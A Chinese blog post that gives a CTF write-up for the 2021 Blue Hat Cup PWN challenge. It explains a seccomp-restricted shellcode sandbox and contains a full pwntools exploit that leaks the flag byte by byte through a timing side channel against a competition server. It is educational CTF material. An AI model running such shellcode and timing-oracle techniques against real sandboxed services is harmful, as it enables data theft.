2021蓝帽杯 PWN writeup

今年蓝帽杯举办时间太阴间了,周四我全天满课啊,我打个锤子打

和队里的队员们中午花了点时间做题,没想到pwn竟然有一道是去年线下决赛原题,怪不得这么多人做出来了:

于是我去研究了一下去年大佬的wp(算是复现了)

题目mmap出了一块可执行内存,地址位于0x10000,随后读取shellcode到这块内存上并执行,在执行前使用seccomp禁掉了除去open/write之外的其他所有系统调用,因此无法通过write系统调用直接leak出flag。考虑单字节爆破flag。

exp:

from pwn import *
file = context.binary = './chall'

def pwn(p, index, ch):
    shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop rax; syscall;"

    # re open, rax => 4
    shellcode += "push 2; pop rax; syscall;"

    # read(rax, 0x10040, 0x50)
    shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"
    
    if index == 0:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
    else:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)

    shellcode = asm(shellcode)
    # print(len(shellcode))
    p.sendafter("Welcome to silent execution-box.\n", shellcode.ljust(0x40-14, b'a') + b'./flag')

index = 0
a = []
# flag{
while True:
    for ch in range(0x20 + 0, 127):
        for _ in range(10):
            try:
                #print("try... %d" % ch)
                p = remote('8.140.177.7', '40334')
                break
            except:
                sleep(3)
                continue

        #p=process(file)
        try:
            pwn(p, index, ch)
        except:
            continue
        start = time.time()
        try:
            p.recv(timeout=2)
        except:
            pass
        end = time.time()
        p.close()
        if end-start > 1.5:
            a.append(ch)
            print("found: " + "".join([chr(i) for i in a]))
            break
    else:
        print("found: " + "".join([chr(i) for i in a]))
        break
    index = index + 1

print("flag: " + "".join([chr(i) for i in a]))
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇